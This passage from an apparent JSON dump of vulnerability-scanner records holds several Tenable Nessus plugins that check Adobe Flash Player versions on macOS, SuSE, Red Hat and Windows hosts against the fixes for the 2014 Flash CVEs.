value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.261\";\nextended_fixed_version = \"11.7.700.269\";\n\nstandard_cutoff_version = \"12.0.0.44\";\nstandard_fixed_version = \"12.0.0.70\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:40", "description": "This update of Adobe Flash Player fixes the following issues :\n\n - A stack overflow vulnerability that could have resulted in arbitrary code execution. 
(CVE-2014-0498)\n\n - A memory leak vulnerability that could have been used to defeat memory address layout randomization.\n (CVE-2014-0499)\n\n - A double free vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-26T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 8922)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140224.NASL", "href": "https://www.tenable.com/plugins/nessus/72700", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72700);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 8922)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of Adobe Flash Player fixes the following issues :\n\n - A stack overflow vulnerability that could have resulted\n in arbitrary code execution. 
(CVE-2014-0498)\n\n - A memory leak vulnerability that could have been used to\n defeat memory address layout randomization.\n (CVE-2014-0499)\n\n - A double free vulnerability that could have resulted in\n arbitrary code execution. (CVE-2014-0502)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=865021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0498.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0499.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0502.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 8922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network 
Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.341-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:38", "description": "An updated Adobe Flash Player package 
that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security bulletin APSB14-07, listed in the References section. Specially crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. (CVE-2014-0498, CVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.341.", "cvss3": {}, "published": "2014-02-23T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0196.NASL", "href": "https://www.tenable.com/plugins/nessus/72643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0196. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72643);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_xref(name:\"RHSA\", value:\"2014:0196\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0196)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes three security issues\nis now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security bulletin\nAPSB14-07, listed in the References section. Specially crafted SWF\ncontent could cause flash-plugin to crash or, potentially, execute\narbitrary code when a victim loads a page containing the malicious SWF\ncontent. 
(CVE-2014-0498, CVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.341.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0499\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0502\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/21\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0196\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.341-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.341-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:26", "description": "Versions of Adobe Flash Player prior to 12.0.0.77 (or 11.7.700.272 for Linux users) are outdated and thus unpatched for the following vulnerabilities :\n\n - A same origin policy bypass vulnerability (CVE-2014-0503).\n - Clipboard content access by an unauthorized, context-dependent attacker (CVE-2014-0504).", "cvss3": {}, "published": "2013-03-13T00:00:00", "type": "nessus", "title": "Flash Player < 12.0.0.77 Multiple Vulnerabilities (APSB14-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8157.PRM", "href": "https://www.tenable.com/plugins/nnm/8157", "sourceData": "Binary data 8157.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:53", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.269 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. 
(CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_12_0_0_77.NASL", "href": "https://www.tenable.com/plugins/nessus/72938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72938);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.269 / 11.8.x /\n11.9.x / 12.0.0.70. It is, therefore, potentially affected by\nmultiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. 
(CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.272 / 12.0.0.77 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.269\";\nextended_fixed_version = \"11.7.700.272\";\n\nstandard_cutoff_version = \"12.0.0.70\";\nstandard_fixed_version = \"12.0.0.77\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:51", "description": "The remote host is missing KB2938527. It is, therefore, affected by multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. 
(CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "MS KB2938527: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2938527.NASL", "href": "https://www.tenable.com/plugins/nessus/72936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72936);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_xref(name:\"MSKB\", value:\"2938527\");\n\n script_name(english:\"MS KB2938527: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2938527. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. 
(CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2938527/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2938527.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 12.0.0.77\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 12 ||\n (\n iver[0] == 12 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 77)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.0.77\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n 
'\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:38", "description": "An updated Adobe Flash Player package that fixes two security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These vulnerabilities are detailed in the Adobe Security bulletin APSB14-08, listed in the References section.\n\nA vulnerability was reported that could be used to bypass the same origin policy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents of the clipboard. 
